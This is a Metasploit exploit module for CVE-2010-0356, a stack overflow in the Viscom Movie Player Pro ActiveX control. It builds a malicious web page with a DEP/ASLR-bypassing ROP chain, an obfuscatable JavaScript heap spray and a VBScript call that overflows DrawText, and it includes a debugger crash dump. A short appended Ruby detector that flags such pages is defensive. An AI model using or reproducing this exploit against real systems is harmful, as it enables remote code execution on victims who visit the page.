##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Viscom Software Movie Player Pro SDK ActiveX 6.8',
      'Description'    => %q{
          Stack-based buffer overflow in the MOVIEPLAYER.MoviePlayerCtrl.1 ActiveX
          control in MoviePlayer.ocx 6.8.0.0 in Viscom Software Movie Player Pro SDK
          ActiveX 6.8 allows remote attackers to execute arbitrary code via a long
          strFontName parameter to the DrawText method. The victim will first be
          required to trust the publisher Viscom Software. This module has been
          designed to bypass DEP and ASLR under XP IE8, Vista and Win7 with Java
          support.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'shinnai', # Vulnerability discovery and original exploit
          'TecR0c',  # Metasploit module
          'mr_me'    # Metasploit module
        ],
      'Version'        => '$Revision: $',
      'References'     =>
        [
          [ 'CVE', '2010-0356' ],
          [ 'OSVDB', '61634' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/12320/' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC'              => 'process',
          'DisablePayloadHandler' => 'false',
          'InitialAutoRunScript'  => 'migrate -f'
        },
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => "\x00"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'Windows IE6-7', {} ],
          [ 'Windows IE8 + JAVA 6 (DEP & ASLR BYPASS)', {} ]
        ],
      'DisclosureDate' => 'Jan 12 2010',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true])
      ], self.class)
  end

  # Prevent module from being executed in autopwn
  def autofilter
    false
  end

  def check_dependencies
    use_zlib
  end

  # Random 32-bit filler value used as padding in the pivot chain
  def junk(n=4)
    return rand_text_alpha(n).unpack("L")[0].to_i
  end

  def on_request_uri(cli, request)
    # Set target manually or automatically
    my_target = target
    if my_target.name == 'Automatic'
      agent = request.headers['User-Agent']
      if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
        my_target = targets[1] # XP
      elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
        my_target = targets[1] # XP
      elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
        my_target = targets[2] # XP
      elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/
        my_target = targets[1] # Vista
      elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8\.0/
        my_target = targets[2] # Vista
      elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
        my_target = targets[2] # Win7
      end
    end

    sploit = rand_text_alpha(32)
    pivot_addr = 0x1126cfe4

    if my_target.name =~ /IE8/
      pivot_rop = [ # Pivot to get to ROP Chain
        0x10015201, # POP EBP # RETN 08 [MOVIEP~1.OCX]
        pivot_addr,
        0x10014361, # MOV ESP,EBP # POP EBP # RETN 08** [MOVIEP~1.OCX]
        junk,       # ---------------------^
        junk,       # ----------------------^
        junk,       # ----------------------^
        junk,       # -------------------------------------^
        junk,       # -------------------------------------^
        0x1001c049, # RETN (ROP NOP) [MOVIEP~1.OCX]
      ].pack("V*")

      sploit << pivot_rop

      code = [0x7C347F98].pack("V") * 4 # RETN (ROP NOP) [MSVCR71.dll]
      code << [ # MSVCR71.dll - rop chain generated with mona.py
        0x7C37653D, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
        0xFFFFFDFF, # Value to negate, will become 0x00000201 (dwSize)
        0x7C347F98, # RETN (ROP NOP)
        0x7C3415A2, # JMP [EAX]
        0xFFFFFFFF, #
        0x7C376402, # Skip 4 bytes
        0x7C351E05, # NEG EAX # RETN
        0x7C345255, # INC EBX # FPATAN # RETN
        0x7C352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
        0x7C344F87, # POP EDX # RETN
        0xFFFFFFC0, # Value to negate, will become 0x00000040
        0x7C351EB1, # NEG EDX # RETN
        0x7C34D201, # POP ECX # RETN
        0x7C38B001, # &Writable location
        0x7C347F97, # POP EAX # RETN
        0x7C37A151, # Ptr to &VirtualProtect() - 0x0EF
        0x7C378C81, # PUSHAD # ADD AL,0EF # RETN
        0x7C345C30, # Ptr to 'push esp' # ret
      ].pack("V*")
      code << payload.encoded
    else
      code = payload.encoded
      sploit << [pivot_addr].pack('V*')
    end

    # Payload in JS format
    code = Rex::Text.to_unescape(code)

    spray = <<-JS
    var heap_lib = new heapLib.ie(0x20000);
    var code = unescape("#{code}");
    var nops = unescape("%u0c0c%u0c0c");
    while (nops.length < 0x2000) nops += nops;
    var offset = nops.substring(0, 0x800-0x20);
    var shellcode = offset + code + nops.substring(0, 0x2000-offset.length-code.length);
    while (shellcode.length < 0x40000) shellcode += shellcode;
    var block = shellcode.substring(0, (0x7fb00-6)/2);
    heap_lib.gc();
    for (var i = 0; i < 0x200; i++) {
      heap_lib.alloc(block);
    }
    JS

    # Use heaplib
    js = heaplib(spray)

    # Obfuscate on demand
    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate
    end

    # Randomize the javascript variable names
    vname   = rand_text_alpha(rand(100) + 1)
    strname = rand_text_alpha(rand(100) + 1)

    html = %Q|<html>
    <object classid='clsid:F4A32EAF-F30D-466D-BEC8-F4ED86CAF84E' id='#{vname}'></object>
    <script>#{js}</script>
    <script language='vbscript'>
    #{strname} = "#{sploit}"
    #{vname}.DrawText 1, 1, 1, "", 1, #{strname}, True, True, True, 1, 1, 1, 1, 1, 1
    </script>
    </html>
    |

    print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

    # Transmit the response to the client
    send_response_html(cli, html)
  end
end

=begin
(78c.1d8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000079f3 ebx=00000000 ecx=0203f298 edx=7c90e4f4 esi=008de5c0 edi=0287f2f4
eip=41414141 esp=0203f300 ebp=0203f4a0 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
41414141 ?????
0:005> dd @esp
0203f300  41414141 41414141 41414141 41414141
0203f310  41414141 41414141 41414141 41414141
0203f320  41414141 41414141 41414141 41414141
0203f330  41414141 41414141 41414141 41414141
0203f340  41414141 41414141 41414141 41414141
0203f350  41414141 41414141 41414141 41414141
0203f360  41414141 41414141 41414141 41414141
0203f370  41414141 41414141 41414141 41414141
=end
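An added, defender-side example (not part of the Metasploit module above, nor of the Viscom product): it scans an HTML page for an <object> that instantiates the MoviePlayerCtrl CLSID used by the module and for a DrawText call whose strFontName (the sixth positional argument) is oversized, following the VBScript variable indirection the module's page uses. The length threshold, the helper names and the sample page are constructed assumptions.

```ruby
VISCOM_CLSID = 'F4A32EAF-F30D-466D-BEC8-F4ED86CAF84E'  # CLSID from the module's <object> tag
FONTNAME_LIMIT = 64  # assumed threshold (not from the page); real font names are far shorter

# Ids of <object> elements that instantiate the given CLSID.
def viscom_object_ids(html, clsid = VISCOM_CLSID)
  html.scan(/<object\b[^>]*>/i).map do |tag|
    next unless tag =~ /classid\s*=\s*['"]clsid:#{Regexp.escape(clsid)}['"]/i
    tag[/\bid\s*=\s*['"]([^'"]+)['"]/i, 1]
  end.compact
end

# Split a VBScript argument list, keeping quoted strings (which may contain commas) whole.
def split_vb_args(args)
  args.scan(/"(?:[^"]|"")*"|[^,\s]+/)
end

# Resolve an argument token to a string: a "..." literal, or a variable assigned earlier
# in the page as name = "...". Returns nil for numbers, booleans and unknown names.
def resolve_vb_string(token, html)
  return token[1..-2] if token.start_with?('"')
  html[/^\s*#{Regexp.escape(token)}\s*=\s*"([^"]*)"/, 1]
end

# Longest strFontName (6th positional DrawText argument) handed to any instance of the control.
def max_drawtext_fontname_length(html)
  viscom_object_ids(html).map do |id|
    html.scan(/#{Regexp.escape(id)}\.DrawText\s+([^\r\n]+)/i).map do |(arglist)|
      font = split_vb_args(arglist)[5]
      font ? (resolve_vb_string(font, html) || '').length : 0
    end.max || 0
  end.max || 0
end

def suspicious_viscom_drawtext?(html, limit = FONTNAME_LIMIT)
  max_drawtext_fontname_length(html) > limit
end

# Constructed sample modelled on the module's HTML: a VBScript variable holding a long
# string is passed as strFontName.
SAMPLE_HTML = <<~HTML
  <html>
  <object classid='clsid:#{VISCOM_CLSID}' id='ctl'></object>
  <script language='vbscript'>
  buf = "#{'A' * 300}"
  ctl.DrawText 1, 1, 1, "", 1, buf, True, True, True, 1, 1, 1, 1, 1, 1
  </script>
  </html>
HTML

puts "max strFontName length: #{max_drawtext_fontname_length(SAMPLE_HTML)}" if $PROGRAM_NAME == __FILE__
```

A page that never instantiates the control scores 0, so ordinary DrawText calls on other objects are not flagged.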